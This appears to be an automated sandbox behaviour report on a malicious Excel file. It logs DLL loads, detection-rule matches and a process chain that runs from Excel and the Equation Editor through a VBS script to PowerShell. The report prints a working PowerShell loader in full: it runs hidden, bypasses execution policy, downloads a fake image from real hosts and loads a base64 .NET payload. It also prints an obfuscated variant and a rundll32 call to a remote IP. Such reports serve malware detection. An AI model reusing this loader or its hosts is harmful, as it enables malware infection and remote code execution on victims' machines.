Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior

Source: Process Memory Space: powershell.exe PID: 2856, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1700, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan[1].doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A8B5A84F.doc, type: DROPPED	Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winXLSX@19/31@3/3

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$P018400.xla.xlsx

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Mutant created: NULL

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVR90F8.tmp

Jump to behavior

Source: P018400.xla.xlsx

OLE indicator, Workbook stream: true

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................P.(.............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`..................................s............8.(.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.1.4.9..............................s............8.(.....&.......H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s............8.(.............H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............................H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<....... ..........................s............8.(.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......8..........................s............................H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.............................F..........................s............8.(.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`.......^..........................s............................H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<.......l..........................s............8.(.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P........................................................s....................v.......H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................<..................................s............8.(.............................	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................................ .......(.P.....................`..................................s............8.(.............H...............	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................(.P.....................`..................................s............8.(.............H...............	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\rundll32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\rundll32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO

Source: P018400.xla.xlsx	ReversingLabs: Detection: 15%
Source: P018400.xla.xlsx	Virustotal: Detection: 22%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Windows\system32\davclnt.dll,DavSetCookie 91.92.244.96 http://91.92.244.96/LEO/CLO
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Leoloverme.vbs"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDgDgTreLwDgTre5DgTreDkDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDcDgTreNgDgTre5DgTreDkDgTreMDgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreag	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://uploaddeimagens.com.br/images/004/738/994/original/new_image_vbs_updated.jpg?1707769907', 'http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.OEL/OEL/69.442.29.19//:ptth' , '1' , 'C:\ProgramData\' , 'LEO','RegAsm',''))} }	Jump to behavior
